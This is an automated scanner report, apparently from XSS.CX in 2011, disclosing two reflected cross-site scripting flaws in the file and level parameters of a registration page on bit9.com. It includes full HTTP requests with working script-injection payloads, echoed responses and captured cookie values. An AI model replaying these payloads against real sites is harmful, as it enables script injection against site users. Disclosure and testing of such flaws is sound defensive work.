XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, bit9.com

Report generated by XSS.CX at Wed Oct 05 16:37:40 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


1. Cross-site scripting (reflected)


1.1. http://www.bit9.com/resources/register/index.php [file parameter]

1.2. http://www.bit9.com/resources/register/index.php [level parameter]



1. Cross-site scripting (reflected)
There are 2 instances of this issue:


1.1. http://www.bit9.com/resources/register/index.php [file parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bit9.com
Path:   /resources/register/index.php

Issue detail

The value of the file request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2faad"><script>alert(1)</script>df05f93dc21 was submitted in the file parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/register/index.php?sfcid=70180000000cYHl&file=Datasheet_Bit9_Parity_for_Q1Labs.pdf2faad"><script>alert(1)</script>df05f93dc21&level=1 HTTP/1.1
Host: www.bit9.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bit9.com/resources/index.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=d4968532ae0287db22971ec819b58e68; __utmx=117019797.00013311102359511243:1:0-0-0; __utmxx=117019797.00013311102359511243:1317850380:2592000; __unam=10039862-132d601b22a-553239d1-1; __utma=242263325.195101426.1317850381.1317850381.1317850381.1; __utmb=242263325.5.9.1317850432476; __utmc=242263325; __utmz=242263325.1317850381.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 21:35:06 GMT
Content-Length: 45070

<!DOCTYPE html>

<html lang="en">
<head>

       
       <title>Learn More About Adaptive Application Whitelisting Solutions and Desktop Security</title>
   <meta name="copyright" content=" Bit9, Inc.
...[SNIP]...
<input type="hidden" name="C_Last_Download1" value="Datasheet_Bit9_Parity_for_Q1Labs.pdf2faad"><script>alert(1)</script>df05f93dc21" />
...[SNIP]...

1.2. http://www.bit9.com/resources/register/index.php [level parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bit9.com
Path:   /resources/register/index.php

Issue detail

The value of the level request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81de5"><script>alert(1)</script>6cee332c591 was submitted in the level parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/register/index.php?sfcid=70180000000cYHl&file=Datasheet_Bit9_Parity_for_Q1Labs.pdf&level=181de5"><script>alert(1)</script>6cee332c591 HTTP/1.1
Host: www.bit9.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bit9.com/resources/index.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=d4968532ae0287db22971ec819b58e68; __utmx=117019797.00013311102359511243:1:0-0-0; __utmxx=117019797.00013311102359511243:1317850380:2592000; __unam=10039862-132d601b22a-553239d1-1; __utma=242263325.195101426.1317850381.1317850381.1317850381.1; __utmb=242263325.5.9.1317850432476; __utmc=242263325; __utmz=242263325.1317850381.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
Date: Wed, 05 Oct 2011 21:35:08 GMT
Content-Length: 45027

<!DOCTYPE html>

<html lang="en">
<head>

       
       <title>Learn More About Adaptive Application Whitelisting Solutions and Desktop Security</title>
   <meta name="copyright" content=" Bit9, Inc.
...[SNIP]...
<input type="hidden" name="retURL" value="http://www.bit9.com/resources/register/thank-you.php?sfcid=70180000000cYHl&level=181de5"><script>alert(1)</script>6cee332c591&file=Datasheet_Bit9_Parity_for_Q1Labs.pdf&kwd=" />
...[SNIP]...
